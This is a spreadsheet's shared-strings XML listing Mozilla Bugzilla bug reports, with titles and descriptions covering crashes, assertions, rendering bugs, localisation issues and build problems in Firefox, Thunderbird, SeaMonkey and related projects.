  <si>
    <t xml:space="preserve">WARNING: NS_ENSURE_TRUE(mSuspendCount &gt; 0) failed with </t>
  </si>
  <si>
    <t>Loading the testcase which is just  triggers:
WARNING: NS_ENSURE_TRUE(mSuspendCount &gt; 0) failed: file mozilla/netwerk/base/src/nsInputStreamPump.cpp line 228
This is just a warning (not an assertion) so it might not be a bug.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-486359</t>
  </si>
  <si>
    <t>IE8 testing for addons.mozilla.org</t>
  </si>
  <si>
    <t>This is a tracking bug for IE8 testing of addons.mozilla.org. No bugs are to be filed as comments in this bug.
Testing to begin asap.
We should verify bugs found are not also present in IE7 and that they were not
marked as WONTFIX.</t>
  </si>
  <si>
    <t>NSS-94356</t>
  </si>
  <si>
    <t>qa_stat is not supposed to kill any processes</t>
  </si>
  <si>
    <t>When exiting the kill_by_name functionallity needs to be turned off</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-214173</t>
  </si>
  <si>
    <t>Crash in typeFromExtEquals</t>
  </si>
  <si>
    <t>missing null check in typeFromExtEquals:
strcmp() line 77
typeFromExtEquals(const char * 0x0012f73c const char * 0x0012f964) line 319 +
13 bytes
nsOSHelperAppService::GetMIMEInfoFromOS(const char * 0x0012f964 const char *
0x0012f73c) line 441 + 29 bytes
nsExternalHelperAppService::GetFromTypeAndExtension(nsExternalHelperAppService *
const 0x00fa5324 const char * 0x0012f964 const char * 0x0012f73c nsIMIMEInfo
* * 0x0012f724) line 2103 + 27 bytes
nsExternalHelperAppService::DoContent(nsExternalHelperAppService * const
0x00fa5318 const char * 0x0012f964 nsIRequest * 0x03e4cff8 nsISupports *
0x03b847c8 nsIStreamListener * * 0x0012f92c) line 337 + 57 bytes
nsDocumentOpenInfo::DispatchContent(nsIRequest * 0x03e4cff8 nsISupports *
0x00000000) line 437 + 97 bytes
nsDocumentOpenInfo::OnStartRequest(nsDocumentOpenInfo * const 0x03c9a9a0
nsIRequest * 0x03e4cff8 nsISupports * 0x00000000) line 227 + 16 bytes
nsHttpChannel::CallOnStartRequest() line 620 + 60 bytes
nsHttpChannel::ProcessNormal() line 747 + 8 bytes
nsHttpChannel::ProcessResponse() line 647 + 8 bytes
nsHttpChannel::OnStartRequest(nsHttpChannel * const 0x03e4d000 nsIRequest *
0x03c885a0 nsISupports * 0x00000000) line 3169 + 11 bytes
nsInputStreamPump::OnStateStart() line 362 + 42 bytes
nsInputStreamPump::OnInputStreamReady(nsInputStreamPump * const 0x03c885a4
nsIAsyncInputStream * 0x03e03f7c) line 318 + 11 bytes
nsInputStreamReadyEvent::EventHandler(PLEvent * 0x03e94b54) line 117
PL_HandleEvent(PLEvent * 0x03e94b54) line 671 + 10 bytes
PL_ProcessPendingEvents(PLEventQueue * 0x00ed8348) line 606 + 9 bytes
_md_EventReceiverProc(HWND__ * 0x00030144 unsigned int 0x0000c0d9 unsigned int
0x00000000 long 0x00ed8348) line 1412 + 9 bytes
USER32! GetSysColor + 1092 bytes
USER32! GetSysColor + 1377 bytes
USER32! DispatchMessageW + 11 bytes
nsAppShellService::Run(nsAppShellService * const 0x0158c800) line 478
main1(int 0x00000003 char * * 0x00262638 nsISupports * 0x00f5add0) line 1290 +
32 bytes
main(int 0x00000003 char * * 0x00262638) line 1669 + 37 bytes
mainCRTStartup() line 338 + 17 bytes
KERNEL32! DosDateTimeToFileTime + 3172 bytes
     LPBYTE pBytes = GetValueBytes( hKey Content Type)
     PRBool eq = strcmp((const char *)pBytes aType) == 0 &lt;-- this crashes if
pBytes is null
might be related to bug 213985</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-453618</t>
  </si>
  <si>
    <t>Slovenian Sunbird -&gt; calendar views are defect</t>
  </si>
  <si>
    <t>STEPS TO REPRODUCE:
===================
- create a new profile and start the slovenian version of sunbird
RESULT:
=======
- calendar view is completely defect
EXPECTED RESULT:
================
- no defect calendar view
REPRODUCIBLE:
=============
- always</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-285050</t>
  </si>
  <si>
    <t>ewsb.co.uk - redirect loop for unsupported browsers</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7.6) Gecko/20050225 Firefox/1.0.1
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7.6) Gecko/20050225 Firefox/1.0.1
Unable to enter web page. (You can using Safari Explorer)
Error message is: 'Redirection limit for this site exceeded' This may be becasue
of cookies unabled
(Cookies ARE enabled)
Reproducible: Always
Steps to Reproduce:
1.Type in the above webpage address.
2.
3.
Actual Results:  
Error message window opens
Expected Results:  
Loaded the web page
There is no workaround as far as I can see.</t>
  </si>
  <si>
    <t>CORE-405382</t>
  </si>
  <si>
    <t>Inline svg does not resize when window is shrunk and expanded</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9b1) Gecko/2007110904 Firefox/3.0b1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9b1) Gecko/2007110904 Firefox/3.0b1
When using svg with the width and height set to 100% inline in an .xhtml file the svg image doesn't expand back to 100% after the the window is resized.
Reproducible: Always
Steps to Reproduce:
1: Make an inline SVG in an XHTML document with the .xhtml extension.
2: Make sure the width and height of the inline SVG is set to 100%.
3: Make sure the SVG viewbox is set to some number large enough to be affected by resizing.
3: Load the file in a large but non-maximized window.
4: Resize the window to a small enough value to cause the SVG to resize.
5: Expand the window.
Actual Results:  
The SVG did not resize to the window size.
Expected Results:  
The SVG should resize to the full size.
This can be worked around by adding a height and width of 100% using CSS styles.</t>
  </si>
  <si>
    <t>firefoxbugs</t>
  </si>
  <si>
    <t>SEAMONKEY-417590</t>
  </si>
  <si>
    <t>port Firefox application pane as new helper app pane in SeaMonkey</t>
  </si>
  <si>
    <t>The Firefox applications pref pane would make a fine addition to trunk SeaMonkey as the new helper app pane in the new prefwindow I have a working first version of this in my tree already :)</t>
  </si>
  <si>
    <t>CORE-399500</t>
  </si>
  <si>
    <t>support XDG user dirs in the directory service</t>
  </si>
  <si>
    <t>The XDG user dirs (see URL) are used by GNOME to find and allow the user to change common directories with localised names. To enable using the Download directory in the toolkit's download manager (bug 399498) the directory service needs to support these directories.</t>
  </si>
  <si>
    <t>CORE-234612</t>
  </si>
  <si>
    <t xml:space="preserve"> inserted into HTML stream</t>
  </si>
  <si>
    <t>User-Agent:       
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7a) Gecko/20040214
I have a php file that has this code :
&lt;?php
$file = jingmei_students.ldif
print ''
?&gt;
&lt;!DOCTYPE html
        PUBLIC -//W3C//DTD XHTML 1.0 Transitional//EN
         http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd&gt;
&lt;html xmlns=http://www.w3.org/1999/xhtml lang=en-US
xml:lang=en-US&gt;Student Phone List
        Student Phone List
          NameRoomPhoneEmail
 etc
When I access this file using Mozilla (and only Mozilla as far as I have tested
[Safari and IE tested]) it occasionally seems that it inserts a '' into
the file so when I save the page ('view html' doesn't show the extra
'') and view it in an editor it shows :
&lt;!DOCTYPE html PUBLIC -//W3C//DTD XHTML 1.0 Transitional//EN
http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd&gt;
&lt;html xmlns=http://www.w3.org/1999/xhtml xml:lang=en-US
lang=en-US&gt;Student Phone List
        Student Phone List
          NameRoomPhoneEmail
 etc
notice the '' before the table tag.
This causes the text in the following table to sometimes be normal sized and
sometimes be small.
I realise there is a fair few pieces of s/w that the html goes through before it
gets to mozilla but I am unsure how to determine if it happens before getting
to mozilla. If you can tell me I will gladly run tests.
Reproducible: Sometimes
Steps to Reproduce:
1.view the php page in mozilla
2.
3.
Actual Results:  
sometimes the text is small sometimes it is normal size
Expected Results:  
should always be small</t>
  </si>
  <si>
    <t>davidmaxwaterman+bugzilla-daemon</t>
  </si>
  <si>
    <t>THUNDERBIRD-476695</t>
  </si>
  <si>
    <t>Activity Manager: Need theme work</t>
  </si>
  <si>
    <t>* the pinstripe theme could use some better icons (the autosync icon in particular is inappropriate)
* we need qute and gnomestripe themes -- note that a simple copy of the pinstripe ones with inspiration from the download manager theme is probably enough.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-417765</t>
  </si>
  <si>
    <t>[META] Tracker for General Enhancements for Persian Users</t>
  </si>
  <si>
    <t>CORE-500324</t>
  </si>
  <si>
    <t>Open  button in download manager doesn't correctly launch the file in its viewer</t>
  </si>
  <si>
    <t>On Maemo if a user downloads a PDF (one of the few file types that we can save) and attempts to open it via the download manager the PDF Viewer for Maemo will open but without loading the file. It should load the file. 
This could be a PDF viewer bug but it may be our interaction with it.
This was found in the Beta 2 candidate build from 6/24.
Steps to Reproduce
1. Go to http://www.irs.gov/pub/irs-pdf/fw4.pdf and save the PDF when prompted.
2. Click on the options button in the right pane
3. Click on the download manager button in options
4. On the line for fw4.pdf in the download manager click on Open
Result: PDF Viewer opens but without loading the file.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-326275</t>
  </si>
  <si>
    <t>Update sv-SE brand.dtd [bug 318991]</t>
  </si>
  <si>
    <t>Bug 318991 removed the version number from releaseURL so we need to do the same.</t>
  </si>
  <si>
    <t>FIREFOX-354130</t>
  </si>
  <si>
    <t>Odd background for inactive tab's CLOSE button ( on hover)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1) Gecko/20060924 BonEcho/2.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1) Gecko/20060924 BonEcho/2.0
Hover over an inactive tab and a background rectangle appears behind and above the CLOSE button
Reproducible: Always
Steps to Reproduce:
1.Have some inactive tabs
2. Hover over any part of the inactive Tab
3. Rectangle appears behind and above the CLOSE button
Expected Results:  
Either better aligned to the CLOSE button or shouldn't exist</t>
  </si>
  <si>
    <t>jjhanna</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-340560</t>
  </si>
  <si>
    <t>Integrate the replication progress dialog into the LDAP directory properties window</t>
  </si>
  <si>
    <t>The replication progress dialog doesn't really need to be a separate window there is some nice real estate available in the directory properites window just underneath the download button. So combining them should reduce codesize.
Additionally this will let us fix some bugs with it like trying to kick off a replication process twice by accidently double clicking on the button etc.
I've a patch coming up.</t>
  </si>
  <si>
    <t>CALENDAR-323477</t>
  </si>
  <si>
    <t>Cannot delete recurring event from multiweek/month view</t>
  </si>
  <si>
    <t>Linux/x86 my own build from CVS 20060113
I find that I cannot delete a weekly-recurring event from within the multiweek view. Neither the Del key nor the entry from the event's context menu nor the entry on the Edit menu do anything at all. No errors on cmdline nor on JS console. I can delete the event in the Week view.
I can delete single non-recurring events in the multiweek view.
To delete a weekly recurring event from within the multiweek view I have to either disable the recurrence and then delete the resulting single event or switch to a different view.</t>
  </si>
  <si>
    <t>calum.mackay</t>
  </si>
  <si>
    <t>CORE-481688</t>
  </si>
  <si>
    <t>[FIX]Stop firing DOMLinkAdded/Removed events to content listeners</t>
  </si>
  <si>
    <t>We have these DOMLinkAdded/Removed events that we fire on  elements... Unfortunately we fire them in ways content can see while stomping on the DOM namespace and all.  Not much we can do about the latter now I think but we should fix the former.</t>
  </si>
  <si>
    <t>CORE-129844</t>
  </si>
  <si>
    <t>Elements appear in wrong place when changing top/left</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:0.9.9+)
Gecko/20020308
BuildID:    20020308
Positioning elements using other elements offsetTop/offsetLeft does not work as
expected. 
The element that you want to position first appears for a milisecond on the top
(or left part) of the screen and then it moves to the correct position.
Think that this is a regression. If i am not mistaken this did not happend with
Netscape 6.1
Reproducible: Always
Steps to Reproduce:
1. Run testcase
2. Mouseover link
3. You see the table in top of the page for a milisecond and then it moves to
the correct position.
If you press reload this will often not happen again but press SHIT + reload
and you will see the problem again.</t>
  </si>
  <si>
    <t>CORE-462851</t>
  </si>
  <si>
    <t>JS_SealObject crash if deep is true.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
Build Identifier: mozilla-central-5bd6876be7f2/js/src (tip at Oct 28 2008)
calling JS_SealObject(cx myObj deep) crash if deep is true.
Reproducible: Always
Steps to Reproduce:
JSObject *myObj = JS_NewObject(cx NULL NULL NULL)
JS_SealObject(cx myObj JS_TRUE)
Actual Results:  
crash in jsfun.cpp:716 (call_enumerate function):
...
fun = js_GetCallObjectFunction() // returns NULL
JS_GET_LOCAL_NAME_COUNT(fun) // (fun)-&gt;u.i.nupvars -&gt; Access violation
...
I use TraceMonkey code from mozilla-central-5bd6876be7f2/js/src compiled with JIT disabled.</t>
  </si>
  <si>
    <t>FIREFOX_FOR_ANDROID_GRAVEYARD-474874</t>
  </si>
  <si>
    <t>misc cleanups for CanvasBrowser.js</t>
  </si>
  <si>
    <t>CORE-86282</t>
  </si>
  <si>
    <t>Never let websites maximize windows</t>
  </si>
  <si>
    <t>The Maximize feature of many window managers (make the window as large as the
screen) makes almost no sense on a workstation or other machines with a very
high resolution display like 1600x1200 or even dual head.
I didn't encounter a situation where a websites maximized a window and I agreed.
Add option to disallow sites to maximize the (browser) window in any way.
I think the only current way is window.open with either some 'maximize' flag or
explicitly giving a size that resembles the screen size (which can be gotten via
JS too). Disable bpth ways if option is on.</t>
  </si>
  <si>
    <t>BUGZILLA-245158</t>
  </si>
  <si>
    <t>Search.pm fails if multiple LEFT JOINs are on the same table in the same chart</t>
  </si>
  <si>
    <t>If in a single chart I try to search for 
CC contains justdave AND
CC contains @bugzilla.org
the resulting query will fail because it tries to do 2 distinct LEFT JOIN
operations on the same table with the same alias.
In order for this to work properly (see bug 237107) Search.pm must do a single
LEFT JOIN for each such case and merge the ON criteria.</t>
  </si>
  <si>
    <t>CORE-338554</t>
  </si>
  <si>
    <t>-moz-box-sizing is not applied to a table cell</t>
  </si>
  <si>
    <t>-moz-box-sizing: border-box is applied to generic block-level element but isn't applied to table cell. See test-case.
Tested on:
Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.0.3) Gecko/20060505 Firefox/1.5.0.3
Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3</t>
  </si>
  <si>
    <t>tal.aloni.il</t>
  </si>
  <si>
    <t>vitaly</t>
  </si>
  <si>
    <t>TOOLKIT-267455</t>
  </si>
  <si>
    <t>Toolkit-only followup for mac re-launch code from app-startup bug</t>
  </si>
  <si>
    <t>This is a followup from the app-startup bug there was a difference between
toolkit and seamonkey that affected appleevents code which couldn't reach the
nativeappsupport object because it is not accessible from the toolkit version
of nsIAppStartup.
The relevant red-fix checkin was here:
http://bonsai.mozilla.org/cvsview2.cgi?diff_mode=context&amp;whitespace_mode=show&amp;file=nsAEApplicationClass.cpp&amp;branch=&amp;root=/cvsroot&amp;subdir=mozilla/xpfe/bootstrap/appleevents&amp;command=DIFF_FRAMESET&amp;rev1=1.9&amp;rev2=1.10
It's not quite tomorrow but here goes.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-157938</t>
  </si>
  <si>
    <t>uses document.all images do not automaticly load</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (OS/2 U Warp 4.5 en-US rv:1.0.0) Gecko/20020602
BuildID:    2002060216
access to the pages is ok but page images do not load.
Images are loaded when a direct link to the image is clicked.
(click on missing image of cap to get expanded image)
this page works fine with Netscape/2 2.02
Reproducible: Always
Steps to Reproduce:
1.load page (no image shown)
2.
3.
Actual Results:  page loads without loading image
Expected Results:  image loaded</t>
  </si>
  <si>
    <t>snapdrgn</t>
  </si>
  <si>
    <t>CORE-246482</t>
  </si>
  <si>
    <t>Double click fails to select a word in BiDi texts</t>
  </si>
  <si>
    <t>To reproduce:
In the soon-to-be-attached testcase double click any word in the first line.
Actual result:
Regardless of which word of the three is double-clicked the last two ×¢×‘×¨×™×ª
English2 get selected.
Expected result:
Only the double-clicked word should be selected as it does in the RTL-only
second line (or in IE6).
Prog.</t>
  </si>
  <si>
    <t>CORE-389224</t>
  </si>
  <si>
    <t>Clipped objects are sometimes not fully redrawn after clipping</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 de rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 de-DE rv:1.9a6pre) Gecko/20070627
When dynamically setting the clip regions of a HTML element the element sometimes isn't shown completely. The change of the clipping regions is done by an interval to have some simple animation effect.
The problem seems to depend on garbage collection this way:
I create complex html:body content dynamically using javascript holding a lot of references to JavaScript objects and back to the DOM elements. I remove all those elements and create others again. Removing and recreating is one step. The clipping animation immidiately starts after such a step. The animation often
hang and is sometimes not rendered completely although the css properties are set correctly. Moving other windows over the incompletely rendered object shows that it's there but not fully redrawn.
My guess is that GC runs after the page recreation step pausing further execution and also timers or at least redrawing. If GC starts before the animation is finished and stops after the animation step in between is not rendered.
Reproducible: Sometimes</t>
  </si>
  <si>
    <t>NSS-157996</t>
  </si>
  <si>
    <t>crlutil should have a way to import CRLs without checking issuer</t>
  </si>
  <si>
    <t>The mozilla browser uses SEC_NewCrl to import a CRL which bypasses the check
for the certificate of the issuer CA.
However crlutil uses CERT_ImportCRL which has that check. This makes it hard
to test bugs coming from mozilla.
I propose a new -B option (B for bypass check or browser emulation) that
will make the alternate call.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-246891</t>
  </si>
  <si>
    <t>Optional GUID for Seamonkey</t>
  </si>
  <si>
    <t>If an extension works for Firebird and/or Thunderbird then it will have an
install.rdf.  I think it should also be able to contain a GUID for Seamonkey so
that when we load them into the DB Seamonkey is auto-detected instead of manual. 
Filing this against UMO cause I dunno where else to put it.  Someone please
assign this to Ben.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-524047</t>
  </si>
  <si>
    <t>Tracking bug for planned power outage</t>
  </si>
  <si>
    <t>On 14th November there were be no power at 650 Castro building for most of the day for maintenance work. This bug is to track:
- what systems to take down/bring back up
- when to send announcements to warn developers (if it takes down the mobile and geriatric machines should we close the tree?)</t>
  </si>
  <si>
    <t>CORE-524252</t>
  </si>
  <si>
    <t>ABORT: unexpected bit remaining in bitfield with contenteditable strikethrough</t>
  </si>
  <si>
    <t>Created attachment 408169
testcase (crashes debug Firefox when loaded)
###!!! ABORT: unexpected bit remaining in bitfield: 'aMaskedValue == 0' file layout/style/nsStyleUtil.cpp line 577
#7  0x125a0746 in nsStyleUtil::AppendBitmaskCSSValue (
  aProperty=eCSSProperty_text_decoration 
  aMaskedValue=32 
  aFirstMask=1 
  aLastMask=8 
  aResult=@0xbfffac54) 
at layout/style/nsStyleUtil.cpp:577</t>
  </si>
  <si>
    <t>FIREFOX-343659</t>
  </si>
  <si>
    <t>Typing into text boxes performs very slowly</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.1a3) Gecko/20060705 BonEcho/2.0a3
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.1a3) Gecko/20060705 BonEcho/2.0a3
With seven or eight tabs open at the time I was typing up something in a large text box in the first tab. While the browser itself seemed to slow down a bit (perhaps not any more than I would have expected with that number of tabs open) typing into that text box became very very slow. I attributed this to the automatic spell checker. After setting layoutspellcheckDefault to 0 I have not had a similar problem. While it would be nice to not sacrifice typing speed (to the point that I am waiting for what I have just typed to pop up on the screen a significant time later) when spell check is enabled what would be preferable is an option in Preferences to disable spell check without having to use about:config or user.js.
Reproducible: Sometimes
Steps to Reproduce:
1. Make sure spell check is on.
2. Load about seven or eight maybe more (but no more than 12 is really needed) tabs with pages in them. I used a couple Lexis-Nexis pages and a few Google searches but any series of pages should work.
3. In one of those tabs preferably the first have a page open with a large text box to type into. Typing into that box should be considerably slower than normal.
Actual Results:  
Typing into the text box was very slow. After closing several tabs it began to speed up a bit. When no other tabs were open I felt it was slower than normal but still not so slow that I had to switch into another program to finish typing (what I ended up having to do by the end of it).
Expected Results:  
The speed with which the typed text appeared on the screen should not have been reduced by the fact that many tabs were open. Alternately the software should have provided a global option within Preferences easily accessible to disable spell check.
Standard Firefox theme. No crash so no Talkback crash ID. Computer configuration: Apple iBook G4 1.33 GHz 512 MB RAM. Three programs running (AdiumX Thunderbird Bon Echo) at the time.</t>
  </si>
  <si>
    <t>tsaler.bugzilla</t>
  </si>
  <si>
    <t>CORE-54132</t>
  </si>
  <si>
    <t>xlib toolkit/widget not completed.</t>
  </si>
  <si>
    <t>More xlib codes need to be checked in.</t>
  </si>
  <si>
    <t>quy</t>
  </si>
  <si>
    <t>CORE-119902</t>
  </si>
  <si>
    <t>Assertions during persistence - nsIOServiceWin.cpp line 83 - Cannot tell if this is a directory</t>
  </si>
  <si>
    <t>The method nsIOService::GetURLSpecFromFile in nsIOServiceWin.cpp asserts if it
cannot tell if a file represents a file or a directory. This assertion fires
when the file does not exist. This is a problem for webbrowserpersist because
this method is called a lot during persistence to make URIs for files it is
*about* to save but don't exist yet. The assertion is also present in the
nsIOServiceMac.cpp nsIOServiceOS2.cpp &amp; nsIOServiceUnix.cpp files.
Can this assertion be replaced with a less alert such as an NS_WARNING?</t>
  </si>
  <si>
    <t>TOOLKIT-424402</t>
  </si>
  <si>
    <t>Test a combination of shared and unshared database connections</t>
  </si>
  <si>
    <t>We currently don't have any tests in the tree that ensure that using a combination of shared and unshared database connections works as expected.  We *really* need this as this issue was brought up in bug 423273.
Myk - I don't have any time for this would you be willing to pick it up?</t>
  </si>
  <si>
    <t>CALENDAR-307230</t>
  </si>
  <si>
    <t>Default Alarm Setting for events to on is ignored</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b4) Gecko/20050906 Firefox/1.4
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20050906 Mozilla Sunbird/0.2+
I have set Default Alarm Setting for events to on but when I make a new
event the alarm on the event is set to off. 
Reproducible: Always
Steps to Reproduce:
1.Tools&gt;Options&gt;Alarms
2.Set Default Alarm Setting for events to on and choose a time interval
3.Create a new event
Actual Results:  
In the new event window the alarm is set to off.
Expected Results:  
The alarm should be on with the specified time interval.</t>
  </si>
  <si>
    <t>FIREFOX-401726</t>
  </si>
  <si>
    <t>orphaned moz_places records maybe not being deleted</t>
  </si>
  <si>
    <t>from Marco:
i was reading out erasehistoryparanoid the query after adding annotations is
    NS_LITERAL_CSTRING(DELETE FROM moz_places 
      WHERE id IN (SELECT h.id FROM moz_places h 
      LEFT OUTER JOIN moz_historyvisits v ON h.id = v.place_id 
      LEFT OUTER JOIN moz_bookmarks b ON h.id = b.fk 
      LEFT OUTER JOIN moz_annos a ON h.id = a.place_id 
      WHERE v.id IS NULL 
      AND b.id IS NULL 
      AND a.expiration = ) +
      nsPrintfCString(%d nsIAnnotationService::EXPIRE_NEVER) +
      NS_LITERAL_CSTRING( AND a.id IS NULL 
      AND SUBSTR(h.url06)  'place:')))
i was noticing the
      AND a.expiration = ) +
      nsPrintfCString(%d nsIAnnotationService::EXPIRE_NEVER) +
      NS_LITERAL_CSTRING( AND a.id IS NULL 
how can expiration be expire_never if there is no annotation (a.id IS NULL)? imho this will not find anything..
maybe it should be  a.expiration != EXPIRE_NEVER and in a block as
AND (a.id IS NULL OR a.expiration != EXPIRE_NEVER ) ?</t>
  </si>
  <si>
    <t>CORE-397448</t>
  </si>
  <si>
    <t>ASSERTION: Doing nscoord addition with values &gt; nscoord_MAX with percentage margin in table cell</t>
  </si>
  <si>
    <t>Created attachment 282211
testcase
Loading the testcase triggers two of the new assertions added in bug 367673:
###!!! ASSERTION: Doing nscoord addition with values &gt; nscoord_MAX: 'a &lt; nscoord_MAX &amp;&amp; b &lt; nscoord_MAX' file ../../dist/include/gfx/nsCoord.h line 151
###!!! ASSERTION: nscoord addition will reach or pass nscoord_MAX: '(PRInt64)a + (PRInt64)b &lt; (PRInt64)nscoord_MAX' file ../../dist/include/gfx/nsCoord.h line 153</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-313201</t>
  </si>
  <si>
    <t>Fix strict warning in utils.js</t>
  </si>
  <si>
    <t>1047 function prompt(msg initial parent title)
1048 {
1049     var PROMPT_CTRID = @mozilla.org/embedcomp/prompt-service1
1050     var nsIPromptService = Components.interfaces.nsIPromptService
1051     var ps = Components.classes[PROMPT_CTRID].getService(nsIPromptService)
1052     if (!parent)
1053         parent = window
1054     if (!title)
1055         title = MSG_PROMPT
1056     rv = { value: initial }
The last line gives a strict warning because rv is not defined. Micro-patch
coming up.</t>
  </si>
  <si>
    <t>CORE-345181</t>
  </si>
  <si>
    <t>Firefox ignores Cache-Control: public header on TLS connections</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
Firefox does not appear to cache responses sent with Cache-Control: public header if they are sent over SSL/TLS. While I'm aware that Firefox generally doesn't cache responses over TLS for security in cases where the response is explicitely defined to be public this would seem to be incorrect behaviour. I'm testing caching behaviour by use of the Cache Source entry from the page info window.
For reference we're using TLS in this instance to ensure integrity rather than security (it's important that the user receives the response we're sending it's not important if anyone else can read that).
Reproducible: Always
Steps to Reproduce:
1. Go to https://bowmore.dcs.st-andrews.ac.uk/mms/images/uparrow.png
2. Right click -&gt; View Page Info
Actual Results:  
Cache source is listed as Not cached.
Expected Results:  
Cache source should be Disk cache. For example go to
http://bowmore.dcs.st-andrews.ac.uk/mms/images/uparrow.png and then View Page Info.</t>
  </si>
  <si>
    <t>rnicoll</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-528280</t>
  </si>
  <si>
    <t>Create PluginCheck web badge</t>
  </si>
  <si>
    <t>Create a Firefox only web badge.
We will get 3 images
- unknown (loading)
- outdated
- current
Their will be an HTML snippet like:
Behavior:
On Firefox:
1) unknown image and link is displayed
2) Perfidies analyzes plugins
3) If an out of date or worse plugin is detected
3.1) Perfidies is stopped
3.2) badge image is switched to outdated
4) or if all plugins are current or unknown
4.1) badge image is switched to current
Other Browsers:
1) unknown image and link is displayed
2) Perfidies is not used
Rewrite Rule:
the affiliate part of the url will be pulled out and added as a query string param. param name TBD.
Hosting: 
Details TBD this badge will be hosted on the plugincheck page initially.</t>
  </si>
  <si>
    <t>BUGZILLA-467569</t>
  </si>
  <si>
    <t>release notes do not indicate newer version of CGI needed</t>
  </si>
  <si>
    <t>The Bugzilla 3.2 release notes correctly list that the Perl CGI module now needs to be version 3.21 but does NOT indicate that this is a new requirement.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-120045</t>
  </si>
  <si>
    <t>Multi-character character constants in nsExternalHelperAppService.cpp</t>
  </si>
  <si>
    <t>while compiling I noticed a bunch of multi-character character constants.
Upon further examination I found that
uriloader/exthander/nsExternalHelperAppService.cpp had things like 'TEXT' in it.
 I modified them the single-quotes to double-quotes where appropriate and the
patch I'll post shortly will be the result.</t>
  </si>
  <si>
    <t>trelane</t>
  </si>
  <si>
    <t>SUPPORT.MOZILLA.ORG-773017</t>
  </si>
  <si>
    <t>Ghost articles in overview section of Localization Dashboard</t>
  </si>
  <si>
    <t>* French:
The Preview section tells that 10 articles (256-246) need to be updated or translated while the other sections say there are 2 articles that need to be updated and 7 to be translated so there's one ghost article.
See https://support.mozilla.org/fr/localization
* Spanish:
The Preview section tells that 31 articles (256-225) need to be updated or translated while the other sections say there are 18 articles that need to be updated and one to be translated so there are 12 ghost articles.
See https://support.mozilla.org/es/localization
It has something to do with redirects that don't show up in locales where they were not localized (see bug 767788). The overall KB article count depends now on the locale.</t>
  </si>
  <si>
    <t>MOZILLA_MESSAGING-466807</t>
  </si>
  <si>
    <t>L10n builds are being incorrectly/mis-generated</t>
  </si>
  <si>
    <t>We've been seeing various reports of problems with l10n nightly builds on the newsgroups. I've verified the de ones are definitely an issue. I'm just kicking off a local build to confirm but compare-locales is saying green and I'm inclined to trust that.
So I think something is going wrong build side here and pulling the wrong source code or the wrong l10n version.
Email that was sent by simon:
here are some excerpts from the recent TB3 beta1 l10n opt-in thread:
| From: tim_maks@planet.nl (Tim Maks van den Broek)
| Subject: Re: [ANNOUNCE] Thunderbird 3 Beta 1 string frozen OPT IN HERE
| | I would really like to opt in the nl version with the revision you | used as a example but when I download the latest build from
| ftp://ftp.mozilla.org/pub/thunderbird/nightly/latest-comm-central-l10n
| I don't get a folder view start page and advanced preferences. I | have no clue what the problem is the buildbot is green but the | tinderboxes are burning.
| | I used the linuxbuild for testing
| From: tim_maks@planet.nl (Tim Maks van den Broek)
| Subject: Re: [ANNOUNCE] Thunderbird 3 Beta 1 string frozen OPT IN HERE
| | I see the same in the de linuxbuild  is there something wrong with | the l10n building or do i do something wrong.....
| From: tomerc@gmail.com (Tomer Cohen)
| Subject: Re: Thunderbird 3 Beta 1 string frozen OPT IN HERE
| | Hebrew (he) is ready.
| http://hg.mozilla.org/l10n-central/he/file/beab2fe87a0e
| | As other people said in this thread the recent builds are not very
| stable...
I just tested this myself in a German Windows ZIP-build and can
see the same things that Tim mentioned.
Here is the output from the error console:
